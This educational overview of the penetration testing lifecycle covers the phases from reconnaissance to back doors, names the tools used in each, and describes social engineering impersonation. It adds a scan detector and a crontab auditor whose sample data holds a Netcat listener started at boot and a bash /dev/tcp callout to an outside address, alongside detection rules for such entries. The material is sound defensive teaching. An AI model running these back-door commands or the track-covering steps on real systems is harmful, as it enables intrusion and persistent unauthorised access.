Penetration testing evaluates the strength of all security controls - procedural, operational, and technological. It is the first line of network defense: a systematic way to discover vulnerabilities and demonstrate how threats can materialize.
Evaluate how secure the network really is - end-to-end, including mobile and BYOD.
Identify weaknesses before attackers do. Prioritize remediation based on real risk.
Exploit vulnerabilities to demonstrate the likelihood and impact of real attacks.
Can include social engineering and physical access - not just technical or cyber operations.
Security of the entire network - servers, clients, mobile devices, BYOD, and infrastructure.
Penetration testing follows a structured lifecycle. Each phase builds on the previous; the last steps (pilfering, covering tracks, back doors) can be iterated as the tester moves laterally across the network.
| Phase | Goal | Tools (Examples) |
|---|---|---|
| Footprinting | Recon, IP ranges, namespace, topology | whois, nslookup, dig, Sam Spade, Google |
| Scanning | Live hosts, open ports, services, OS | nmap, fping, Superscan, queso, siphon |
| Enumeration | User accounts, file shares, banners | dumpACL, showmount, legion, rpcinfo, netcat |
| Gaining Access | Exploit vulnerabilities | tcpdump, L0phtcrack, legion, pwdump2, ttdb |
| Escalating Privilege | Root/superuser access | John the Ripper, Getadmin, sechole |
| Pilfering | Trusts, credentials, config files | rhosts, LSA secrets, registry |
| Covering Tracks | Hide evidence | Zap, rootkits, file streaming |
| Creating Back Doors | Persistence | Netcat, cron, at, startup folder, keystroke loggers |
Footprinting
Gather general information: target IP/phone ranges, namespace, network topology. Essential for a surgical attack - you need IP addresses to scan, domain names for DNS work, and topology to plan lateral movement.
Google, EDGAR, search engines - domain names, administrator contacts, IP addresses, name servers.
whois (Network Solutions, ARIN), nslookup (ls -d), dig - zone transfers.
VisualRoute, traceroute - map paths and hops to understand network layout.
Scanning
Discover which machines are up, which ports are open, which services run, and their versions, then look up known vulnerabilities for those versions. Focus on the most promising avenues (e.g., always-on web services) while reducing scan frequency and randomizing order to avoid detection.
nmap is one of the most popular tools: it performs ping sweeps, port scans, service/version detection, and OS fingerprinting in a single toolkit.
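The defender's side of the scanning phase, as an added example that is not from the original page: a small Python detector reads constructed firewall deny lines and flags a source that touches many distinct ports on one host (port scan) or one port on many hosts (ping/host sweep). It counts distinct targets inside a long sliding window rather than packets per second, so the slow, shuffled scans described above still trip it; the log format, field names and thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed firewall deny lines (assumed format, not from the page): 10.0.0.5 probes
# several ports of one host slowly and out of order, 10.0.0.9 sweeps one port across
# hosts, and 10.0.0.7 is ordinary noise that must not be flagged.
LOG_LINES = """\
2024-03-01T10:00:00 DENY src=10.0.0.5 dst=192.168.1.10 dport=443
2024-03-01T10:04:10 DENY src=10.0.0.5 dst=192.168.1.10 dport=22
2024-03-01T10:09:30 DENY src=10.0.0.5 dst=192.168.1.10 dport=8080
2024-03-01T10:13:05 DENY src=10.0.0.5 dst=192.168.1.10 dport=21
2024-03-01T10:18:45 DENY src=10.0.0.5 dst=192.168.1.10 dport=3389
2024-03-01T10:01:00 DENY src=10.0.0.9 dst=192.168.1.11 dport=445
2024-03-01T10:01:01 DENY src=10.0.0.9 dst=192.168.1.12 dport=445
2024-03-01T10:01:02 DENY src=10.0.0.9 dst=192.168.1.13 dport=445
2024-03-01T10:01:03 DENY src=10.0.0.9 dst=192.168.1.14 dport=445
2024-03-01T10:01:04 DENY src=10.0.0.9 dst=192.168.1.15 dport=445
2024-03-01T10:30:00 DENY src=10.0.0.7 dst=192.168.1.10 dport=443
2024-03-01T10:31:00 DENY src=10.0.0.7 dst=192.168.1.10 dport=443
""".splitlines()

LINE_RE = re.compile(r"^(\S+) DENY src=(\S+) dst=(\S+) dport=(\d+)$")

def detect_scans(lines, window=timedelta(hours=1), port_threshold=5, host_threshold=5):
    """Return {src: kind} for sources whose distinct target count inside any
    window-long span reaches a threshold. Counting distinct ports/hosts instead
    of a packet rate is what keeps a slowed-down, randomized scan visible."""
    events = defaultdict(list)  # src -> [(timestamp, dst_host, dst_port)]
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # tolerate unparseable lines instead of aborting the run
        ts = datetime.fromisoformat(m.group(1))
        events[m.group(2)].append((ts, m.group(3), int(m.group(4))))
    findings = {}
    for src, evs in events.items():
        evs.sort()  # lines arrive out of order when collected from several sensors
        for i, (start, _, _) in enumerate(evs):
            in_win = [e for e in evs[i:] if e[0] - start <= window]
            ports = {port for _, _, port in in_win}
            hosts = {host for _, host, _ in in_win}
            if len(ports) >= port_threshold:
                findings[src] = "port scan"
                break
            if len(hosts) >= host_threshold:
                findings[src] = "host sweep"
                break
    return findings
```

Tuning the window longer and the thresholds lower trades false positives for sensitivity to even slower scans; the distinct-count logic itself does not change.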
Enumeration
Identify valid user accounts and poorly protected resource shares. More intrusive than scanning: targeted probing for accounts, file shares, and application information.
Null sessions, dumpACL, Sid2user, onSiteAdmin - list accounts for password spraying or credential stuffing.
showmount, NAT, legion - discover NFS/SMB shares, which are often misconfigured.
telnet, netcat, rpcinfo - identify application versions for vulnerability lookup.
Gaining Access
Identify a vulnerability found during scanning/enumeration and exploit it, often with existing tools (Metasploit, custom scripts). Automatic exploit generation from a newly found vulnerability is still an open problem, so manual work is usually required.
tcpdump, ssldump - capture cleartext or cracked credentials on the wire.
L0phtcrack, readsmb, legion - file share and password cracking.
Buffer overflow, IIS .HTR/ISM.DLL - exploit vulnerable service versions.
Escalating Privilege
If only user-level access was obtained, seek root/superuser access. Tools: John the Ripper, L0phtcrack (password cracking), Getadmin, sechole (known privilege-escalation exploits).
Pilfering
Gather the information needed to reach trusted systems: evaluate trust relationships and search for cleartext passwords in rhosts files, LSA secrets, configuration files, and the registry.
Covering Tracks
Once total ownership is secured, hide the evidence: clear logs (Zap, Event Log GUI) and hide tools (rootkits, file streaming).
Creating Back Doors
Ensure easy re-entry: rogue accounts, cron/at jobs, startup folder/registry entries, Netcat listeners, keystroke loggers, remote desktop/VNC.
Persistence and stealth - iterate: move from one host/account to the next, capture credentials, install backdoors, hide tracks. Insert proxies or MITM to record traffic and identify high-value targets.
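A defender's check for the back-door mechanisms listed above, as an added example that is not from the original page: a Python audit over constructed per-user crontab listings that reports @reboot entries and commands showing Netcat-listener, /dev/tcp, world-writable-directory or hidden-path patterns. The listing format, the rule set and the sample entries are assumptions; the same rule list can be applied to at-job or startup-folder entries.

```python
import re

# Constructed per-user crontab listings (assumed format, not from the page). The
# root and www-data entries contain the kinds of back doors the lifecycle lists.
CRONTABS = {
    "root": [
        "0 2 * * * /usr/sbin/logrotate /etc/logrotate.conf",
        "@reboot /tmp/.cache/nc -l -p 4444",
    ],
    "www-data": [
        "*/5 * * * * /usr/bin/php /var/www/cron.php",
        "* * * * * bash -c 'exec 3<>/dev/tcp/203.0.113.7/8443'",
    ],
}

# Each rule is (compiled pattern, reason). Patterns run against the command part
# only, never the schedule, so a "*" in the schedule can never trigger them.
RULES = [
    (re.compile(r"(^|/)(nc|ncat|netcat)\s(.*\s)?-l\b"), "netcat listener"),
    (re.compile(r"/dev/tcp/"), "bash /dev/tcp network redirection"),
    (re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/"), "program under world-writable directory"),
    (re.compile(r"/\.[^/\s]+/"), "hidden directory in path"),
    (re.compile(r"base64\s+(-d|--decode)\b"), "payload decoded at run time"),
]

# Schedule is either an @keyword or five whitespace-separated fields.
CRON_RE = re.compile(r"^(@\w+|(?:\S+\s+){5})\s*(.+)$")

def audit_crontabs(crontabs):
    """Return [(user, schedule, command, [reasons])] for entries matching a rule.
    @reboot entries are always reported: that is the classic way to make a
    listener survive a restart, even when the command itself looks harmless."""
    hits = []
    for user, entries in crontabs.items():
        for entry in entries:
            if not entry.strip() or entry.lstrip().startswith("#"):
                continue  # blank lines and comments carry no command
            m = CRON_RE.match(entry.strip())
            if not m:
                continue  # environment settings such as PATH= are not jobs
            schedule, command = m.group(1).strip(), m.group(2).strip()
            reasons = [why for pat, why in RULES if pat.search(command)]
            if schedule == "@reboot":
                reasons.insert(0, "runs at every boot")
            if reasons:
                hits.append((user, schedule, command, reasons))
    return hits
```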
Footprint IP/domain, scan ports/services, enumerate users and shares.
Gain access, escalate to root, steal credentials for lateral movement.
Hide evidence, create persistence. Iterate across the network.
Ping sweep, port scan, service detection, OS fingerprinting.
Vulnerability exploitation, scanning, reporting.
Identify policy gaps; users are the weakest link.
Peter Kim - practical guide: Kali setup, scanning, Metasploit, SQLi/XSS/CSRF, lateral movement, social engineering, reporting.
Web app vulns: injection, broken auth, XSS, broken access control, misconfiguration.
Web security audit - reflected/stored XSS, session hijacking, ReDoS, tabnabbing.
Social Engineering
Social engineering is a fast, low-risk method to gain access. It abuses trusted relationships, requires no specialized equipment, and manipulates users into undermining their own security.
Impersonation Types
Blend in; look for passwords on sticky notes, unattended papers, and overheard confidential conversations.
Uniform - rarely questioned; may plant surveillance devices or reach sensitive areas.
Pretend to be in charge (in person or by phone); the third-party authorization trick.
Send mail asking for personal information - users tend to trust printed materials more than email.
Computer-Based Attacks
Countermeasures